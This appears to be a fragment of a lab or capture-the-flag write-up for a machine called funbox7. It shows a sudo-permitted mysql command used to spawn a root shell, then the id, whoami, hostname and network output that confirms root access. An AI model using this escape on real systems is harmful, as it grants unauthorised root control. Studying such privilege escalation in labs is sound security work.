sudo mysql
The goat user has sudo privileges to execute the /usr/bin/mysql command as the root account without getting prompted for password
goat@funbox7:~$ sudo mysql -e '\! /bin/sh'
#
# id
uid=0(root) gid=0(root) groups=0(root)
# /usr/bin/whoami
root
# /bin/hostname
funbox7
# /bin/ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:db:3c brd ff:ff:ff:ff:ff:ff
inet 192.168.187.132/24 brd 192.168.187.255 scope global ens192
valid_lft forever preferred_lft foreverSystem level compromise